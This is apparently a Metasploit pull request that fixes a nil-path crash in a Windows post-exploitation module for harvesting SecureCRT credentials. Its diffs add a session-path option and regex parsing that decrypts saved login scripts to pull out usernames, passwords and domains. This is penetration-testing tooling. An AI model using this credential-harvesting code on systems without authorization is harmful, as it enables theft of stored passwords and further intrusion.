### PR TITLE
Fix gather securecrt password bug

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/securecrt.md
+++ b/documentation/modules/post/windows/gather/credentials/securecrt.md
@@ -60,6 +60,15 @@ The configuration password that was set when SecureCRT was installed, if one was
 Note that if this value is not supplied and SecureCRT was set up to use a configuration password,
 it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
 
+### SESSION_PATH
+The path to the SecureCRT session directory on the target's computer. By default this is normally
+stored at `C:\\Users\\*current user name*\\AppData\\Roaming\\VanDyke\\Config\\Sessions` if SecureCRT
+is installed on the system, however SecureCRT also has a portable version that stores the session information
+in a local folder along with the SecureCRT binary itself, allowing users to easily transfer their session
+information between machines. In this case, users can set the `SESSION_PATH` option to the location
+of the session directory within the portable folder to allow them to obtain SecureCRT session
+information even if a portable version of SecureCRT is utilized on the target.
+
 ## Scenarios
 
 ### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -33,6 +33,7 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('PASSPHRASE', [ false, 'The configuration password that was set when SecureCRT was installed, if one was supplied']),
+        OptString.new('SESSION_PATH', [ false, 'Specifies the session directory path for SecureCRT']),
       ]
     )
   end
@@ -73,13 +74,24 @@ class MetasploitModule < Msf::Post
       end
 
       file = try_encode_file(file_contents)
-      protocol = Regexp.compile('S:"Protocol Name"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
-      hostname = Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
-      password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
-      passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      protocol = Regexp.compile('S:"Protocol Name"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
+      hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
+      decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      if !decrypted_script.nil?
+        username = decrypted_script.match(/login name:\x1F(\S+)\x1F0\x1Fpass/u)[1]
+        password = decrypted_script.match(/password:\x1F([\S]+)\x1F0/u)[1]
+        domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u)[1] : nil
+        if !domain.nil?
+          username = domain + '\\' + username
+        end
+      else
+        password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
+        passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+        username = Regexp.compile('S:"Username"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
+      end
+
       port = Regexp.compile("D:\"\\\[#{protocol}\\\] Port\"=([0-9a-f]{8})").match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
       port = Regexp.compile('D:"Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil if !port
-      username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
 
       tbl << {
         file_name: item['name'],
@@ -159,9 +171,16 @@ class MetasploitModule < Msf::Post
 
   def run
     print_status("Gathering SecureCRT session information from #{sysinfo['Computer']}")
-    parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
-    # get session file path
-    securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + 'Sessions')
+    securecrt_path = ''
+    if datastore['SESSION_PATH'].to_s.empty?
+      parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
+      # get session file path
+      root_path = registry_getvaldata(parent_key, 'Config Path')
+      securecrt_path = expand_path(root_path + session.fs.file.separator + 'Sessions') if !root_path.nil?
+    else
+      securecrt_path = expand_path(datastore['SESSION_PATH'])
+    end
+
     if securecrt_path.to_s.empty?
       print_error('Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
     else

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Post
       parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
       # get session file path
       root_path = registry_getvaldata(parent_key, 'Config Path')
-      securecrt_path = expand_path(root_path + session.fs.file.separator + 'Sessions') if !root_path.nil?
+      securecrt_path = expand_path(root_path + session.fs.file.separator + 'Sessions') if !root_path.to_s.empty?
     else
       securecrt_path = expand_path(datastore['SESSION_PATH'])
     end


### PR DESCRIPTION
Check that the folder does not exist
When the target host does not have SecureCRT installed, the session path of SecureCRT cannot be found in the registry.
```
[*] Gathering SecureCRT session information from CHINA-31F1EBBE8
[-] Post failed: NoMethodError undefined method `+' for nil:NilClass
[-] Call stack:
[-]   /home/kali-team/Projects/RubyProjects/metasploit-framework/modules/post/windows/gather/credentials/securecrt.rb:175:in `run'
```
- I'm sorry, I should have discovered this problem, but I forgot to fix it.
- The directory that specifies SecureCRT has now been added to make the portable and non installed versions of SecureCRT available